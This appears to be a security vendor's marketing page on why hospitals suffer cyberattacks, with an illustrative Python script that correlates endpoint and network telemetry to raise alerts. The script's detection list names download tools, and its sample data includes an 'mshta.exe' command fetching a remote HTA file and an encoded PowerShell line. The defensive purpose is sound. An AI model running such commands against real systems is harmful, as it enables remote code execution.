Why are healthcare facilities a focus of attacks?
The weak protection of the healthcare sector is one of its biggest problems in times of pandemic.
Cyber-attacks on hospitals seek easy financial gain: the pressure these institutions are under when their systems are down precipitates ransom payments in many ransomware cases. There are other motivations too, such as identity theft, the theft of medical equipment, the sale of sensitive information on the dark web, or even direct access to patient data.
In 2020, Latin America saw a 112% increase in attacks on the sector. In Europe, Spain ranks second on the list, and it is the third most affected country worldwide, after Canada (250%) and Germany (220%).
24/7 interconnected equipment and devices
Firstly, these are centers with constant activity (24x7x365), with management and diagnostic equipment that is always connected and that contains an ever greater share of computerized components. Healthcare centers have a very complex infrastructure to manage the wide variety of devices and equipment. In addition, this equipment tends to be very long-lived, and its security controls become obsolete over time.
Lack of computer security training
Perhaps one of the attacks that has most surprised the educational community was the one suffered by several leading universities around the world on their supercomputers, such as those of the universities of Edinburgh, Munich and Dresden. The purpose of this attack was to put these computers to work "mining" cryptocurrencies, a type of threat that, according to data from the European Union Agency for Cybersecurity (ENISA), is one of the 15 main threats occurring on the European continent, and which shows that even the most advanced computers are susceptible to attack.
Outdated software and obsolete equipment
Often, the various software packages used to manage general information, or even diagnostic data, lack the relevant security updates or run on operating systems without any kind of maintenance.
According to a 2019 Forescout report, 70% of computers in the healthcare sector run operating systems without maintenance support, such as Windows 7, which Microsoft stopped supporting in January 2020.
More attack surface every day
The exponential growth in medical devices that require an Internet connection means that every hospital presents a large attack surface.
As early as 2019, an IRDETO survey of more than 700 security managers at hospital centers in the United States indicated that 82% of these centers had already suffered attacks targeting this type of facility.
Artificial intelligence against 0-day attacks
Cybersecurity platforms with Artificial Intelligence such as Darktrace make it possible to gain visibility of threats across the corporate network and to respond to them autonomously within seconds, before information is compromised.
Securing Microsoft environments and cloud solutions
We specialize in analyzing the company's M365 implementation and adapt the platform by integrating cybersecurity tools and applying specific configurations so that information is protected at all times.
SOFISTIC performs a multilevel analysis of the state of cloud services, looking for configuration defects or open doors in order to prevent future attacks.
ATLANTIS SOC Security Operations Center
Combining Sofistic's 24/7 monitoring service, Atlantis SOC, with other security protocols and tools allows centralized management of all threats and a fast and effective response. In addition, being operated from two continents improves efficiency and gives closer contact with the CSIRTs / CERTs in each country.
Training / consulting and vulnerability analysis (pentesting) services
Our pentesting service performs a thorough analysis of the client's vulnerabilities (as well as configuration defects and backdoors) and delivers instructions for remediating the findings.
A very important part of our work also involves training security teams in cybersecurity and in the additional protocols and measures to be carried out.
EDR, NDR and XDR: Behavioral analysis and autonomous response
As we know, it is very important to secure the devices of the infrastructure's users in order to close possible attack routes to the core of the institution. Through EDR (Endpoint Detection and Response) solutions such as CrowdStrike and NDR (Network Detection and Response) solutions such as Darktrace we obtain visibility across all devices and the network, detecting cyber-attacks at the earliest stages with the support of Artificial Intelligence and Machine Learning. By combining these tools we achieve what is known as XDR (Extended Detection and Response), providing a higher level of protection by covering both the devices and the network.
Additionally, we can make use of solutions such as Exabeam or Microsoft Sentinel to collect and correlate a greater number of events occurring at multiple security layers. In this way, investigations become more thorough and we can detect and respond to much more sophisticated cyber-attacks.
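As an added illustration of the cross-layer correlation described above (this is example code written for this page, not Sofistic's code nor that of Exabeam, Sentinel, CrowdStrike or Darktrace), the following Python joins endpoint process events and network flow events by host and time window, so that a suspicious process start followed shortly by an outbound connection from the same host becomes one alert instead of two unrelated low-severity events. The hostnames, addresses, timestamps and the list of suspicious process markers are all constructed for the example.

```python
"""Correlate endpoint (EDR) and network (NDR) telemetry by host and time window.

Rule: a suspicious process start on a host, followed within a short window by
an outbound connection from the same host to a non-internal address, is raised
as a single cross-layer alert. All events, hostnames, addresses and timestamps
below are constructed sample data, not real telemetry.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Event:
    ts: datetime
    host: str
    source: str   # "edr" (process telemetry) or "ndr" (network flow)
    detail: str   # command line for edr, "ip:port" destination for ndr


# Hypothetical list of process patterns treated as suspicious
# (encoded PowerShell, LOLBins used for download); not a vendor rule set.
SUSPICIOUS_MARKERS = ("powershell.exe -enc", "mshta.exe", "certutil.exe -urlcache")

# RFC 1918 ranges checked explicitly: ipaddress's is_private also classifies
# documentation ranges such as 203.0.113.0/24 (used in the sample) as private.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

WINDOW = timedelta(seconds=60)


def is_suspicious_process(cmdline: str) -> bool:
    low = cmdline.lower()
    return any(marker in low for marker in SUSPICIOUS_MARKERS)


def is_external(destination: str) -> bool:
    """True when the 'ip:port' destination lies outside the RFC 1918 ranges."""
    addr = ip_address(destination.rsplit(":", 1)[0])
    return not any(addr in net for net in INTERNAL_NETS)


def correlate(edr_events: List[Event], ndr_events: List[Event],
              window: timedelta = WINDOW) -> List[Tuple[str, str, str]]:
    """Return (host, command line, destination) for each suspicious process
    that is followed within `window` by an external connection from that host."""
    flows_by_host: Dict[str, List[Event]] = {}
    for flow in ndr_events:
        flows_by_host.setdefault(flow.host, []).append(flow)

    alerts = []
    for proc in edr_events:
        if proc.source != "edr" or not is_suspicious_process(proc.detail):
            continue
        for flow in sorted(flows_by_host.get(proc.host, []), key=lambda e: e.ts):
            if proc.ts <= flow.ts <= proc.ts + window and is_external(flow.detail):
                alerts.append((proc.host, proc.detail, flow.detail))
    return alerts


# Constructed sample telemetry (hypothetical hostnames; documentation IP ranges).
T0 = datetime(2021, 3, 1, 9, 0, 0)
EDR_EVENTS = [
    Event(T0 + timedelta(seconds=5), "mri-ws-01", "edr", "powershell.exe -enc aQBlAHgA"),
    Event(T0 + timedelta(minutes=10), "reception-pc-3", "edr", "winword.exe"),
    Event(T0 + timedelta(minutes=20), "lab-pc-7", "edr", "mshta.exe http://203.0.113.9/x.hta"),
]
NDR_EVENTS = [
    Event(T0 + timedelta(seconds=12), "mri-ws-01", "ndr", "10.0.0.5:445"),      # internal SMB: ignored
    Event(T0 + timedelta(seconds=20), "mri-ws-01", "ndr", "203.0.113.7:443"),   # external, inside window
    Event(T0 + timedelta(minutes=5), "mri-ws-01", "ndr", "198.51.100.9:443"),   # external, outside window
    Event(T0 + timedelta(minutes=10, seconds=30), "reception-pc-3", "ndr", "198.51.100.9:443"),  # benign process
    Event(T0 + timedelta(minutes=20, seconds=3), "lab-pc-7", "ndr", "203.0.113.9:80"),
]

if __name__ == "__main__":
    for host, cmd, dest in correlate(EDR_EVENTS, NDR_EVENTS):
        print(f"ALERT {host}: {cmd!r} followed by connection to {dest}")
```

Run stand-alone, the script prints two alerts (for mri-ws-01 and lab-pc-7) and stays silent about the internal SMB flow, the flow outside the window, and the benign Word process. In a real deployment the same join is expressed in the SIEM's query language over the EDR and NDR connectors rather than in Python; the point is that neither event alone would warrant an alert, while the combination does.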
Sofistic has 35 clients in the financial sector internationally, mainly in Latin America, with whom it has implemented various solutions for the broad protection of companies.